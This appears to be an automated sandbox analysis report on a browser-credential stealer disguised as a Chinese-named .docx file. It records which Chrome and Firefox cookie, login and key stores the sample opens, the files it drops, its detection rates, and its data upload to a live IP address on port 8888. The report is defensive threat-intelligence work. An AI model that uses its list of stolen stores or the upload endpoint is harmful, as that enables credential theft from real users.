Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior

Remote Access Functionality

Yara detected HackBrowser

Source: Yara match	File source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.2083812372.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe PID: 5952, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
43.248.8.109	unknown	Hong Kong		134705	ITACE-AS-APItaceInternationalLimitedHK	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://43.248.8.109:8888/upload	false	0%, Virustotal, Browse	unknown

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\Cookies_2.temp	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4	9D46F142BBCF25D0D495FF1F3A7609D3	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
C:\Users\user\AppData\Local\Temp\History_4.temp	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\Users\user\AppData\Local\Temp\History_5.temp	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\Users\user\AppData\Local\Temp\Local State_0.temp	JSON data	174BC06D568819E002A136E848701847	DECE64C7FC14E7F0D9EF0ACFEF61D2E251242E85	0BD2C19EA8665923BD8DD8D3992BBB2DB9B958B46CAACAD84DC5E03C258C7EB1
C:\Users\user\AppData\Local\Temp\Local Storage\leveldb_7.temp\CURRENT	ASCII text	46295CAC801E5D4857D09837238A6394	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
C:\Users\user\AppData\Local\Temp\Local Storage\leveldb_7.temp\LOG	ASCII text	BB83B276E0D451C5E59790729A247B67	A5F99AAA624DCB5EBFB943F45487800F099201D6	50D2D932726553113F566EBDFEE1A0BE1545982D7806559B1F120F9EAB1E5715
C:\Users\user\AppData\Local\Temp\Local Storage\leveldb_7.temp\LOG.old	ASCII text	4544A2EB37EB81D1F881873B45E425BE	38EF753A08105CC6D094CEDE2CDC16203ED7C72F	8E7E5F4569D56EB9ADA4EE41171866696900332EAFF48D63906EEED8C03E69FB
C:\Users\user\AppData\Local\Temp\Local Storage\leveldb_7.temp\MANIFEST-000001	OpenPGP Secret Key	5AF87DFD673BA2115E2FCF5CFDB727AB	D5B5BBF396DC291274584EF71F444F420B6056F1	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
C:\Users\user\AppData\Local\Temp\Login Data_1.temp	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\Users\user\AppData\Local\Temp\Secure Preferences_9.temp	JSON data	6FA81B50099F975A9116F434CDBF0699	C78FCE6AAE98D9C6D5CFC320DA752E81FF7551DE	BBE2E873534A54C70B97598BB1E602056E4865FADB416790F712236EA7679A5D
C:\Users\user\AppData\Local\Temp\Session Storage_8.temp\000003.log	data	6153AE3A389CFBA4B2FE34025943EC59	C5762DBAE34261A19EC867FFEA81551757373785	93C2B2B9CE1D2A2F28FAC5AADC19C713B567DF08EAEEF4167B6543A1CD094A61
C:\Users\user\AppData\Local\Temp\Session Storage_8.temp\CURRENT	ASCII text	46295CAC801E5D4857D09837238A6394	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
C:\Users\user\AppData\Local\Temp\Session Storage_8.temp\LOG	ASCII text	375098C63A029874B71E175F73741591	BB2B475E0BFB57B562B93D0B0893E0A36D603345	FFCEF641EE71F6CE5CD8D0955AF7ABF4ACEE746322F0C493E4327E794B3EA4CC
C:\Users\user\AppData\Local\Temp\Session Storage_8.temp\MANIFEST-000001	OpenPGP Secret Key	5AF87DFD673BA2115E2FCF5CFDB727AB	D5B5BBF396DC291274584EF71F444F420B6056F1	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
C:\Users\user\AppData\Local\Temp\Web Data_6.temp	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	429F49156428FD53EB06FC82088FD324	560E48154B4611838CD4E9DF4C14D0F9840F06AF	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
C:\Users\user\AppData\Local\Temp\cookies.sqlite_14.temp	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\Users\user\AppData\Local\Temp\encrypted-4196093820.dat	data	3EFA8B1735294006BF19DB2BC629D0F2	10CC9AD4D7156BDF699E87DDFA455487AEDA5CB8	FBA200AABBAF2B7BD1A65DDDF48FB2BD70B59B6E5B8113DD1DDD5D6EEA2E199A
C:\Users\user\AppData\Local\Temp\extensions.json_21.temp	JSON data	98875950B62B398FFE70C0A8D0998017	CFCFFF938402E53D341FE392E25D2E6C557E548F	1B445C7E12712026D4E663426527CE58FD221D2E26545AEA699E67D60F16E7F0
C:\Users\user\AppData\Local\Temp\key4.db_12.temp	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2	F7EEE7B0D281E250D1D8E36486F5A2C3	309736A27E794672BD1BDFBAC69B2C6734FC25CE	378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
C:\Users\user\AppData\Local\Temp\places.sqlite_15.temp	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	D2A38A463B7925FE3ABE31ECCCE66ACA	A1824888F9E086439B287DEA497F660F3AA4B397	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
C:\Users\user\AppData\Local\Temp\places.sqlite_16.temp	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	D2A38A463B7925FE3ABE31ECCCE66ACA	A1824888F9E086439B287DEA497F660F3AA4B397	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
C:\Users\user\AppData\Local\Temp\places.sqlite_17.temp	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	D2A38A463B7925FE3ABE31ECCCE66ACA	A1824888F9E086439B287DEA497F660F3AA4B397	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
C:\Users\user\AppData\Local\Temp\webappsstore.sqlite_19.temp	SQLite 3.x database, user version 2, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 2	72BCFF6B14E4D56701817BDC948967AA	8BB20201B2162FEFF149BA0281426FA1A67697C4	741EE4D7724BEF132AA68BE667DDD8CB462A2DB886156280113018B4FB774ACD
C:\Users\user\AppData\Roaming\hack\archive.zip	Zip archive data, at least v2.0 to extract, compression method=deflate	4E714A0E656A2574CE4BCFECD2C57D46	863425DE6738DF00C07FAA8CC5F1A2D82146C09E	085FBB2B2010714F78019F24F2C97D0BDCECC8A19112A91FAB94FA4A1929916E
C:\Users\user\AppData\Roaming\hack\chrome_default_cookie.csv	CSV text	D52423BDC282644B5CCBD95622C68FB8	99E2018DB8345C8C1C8A841C16AA1A2E81D3F863	495B2BE7373EBD47161CD47632E86C6F66B759E76678EBD7E7026A632BCACF1E

AV Detection

Multi AV Scanner detection for submitted file

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	ReversingLabs: Detection: 54%
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Virustotal: Detection: 50%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.6% probability

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49704

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49704 -> 43.248.8.109:8888

Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109

Source: unknown

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: http://43.248.8.109:8888/uploadfmt:
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: http://file://mailto:http://BINARY-x0X03.46.0
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://chrome.google.com/webstore
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: https://chrome.google.com/webstore/detail/PrintableString
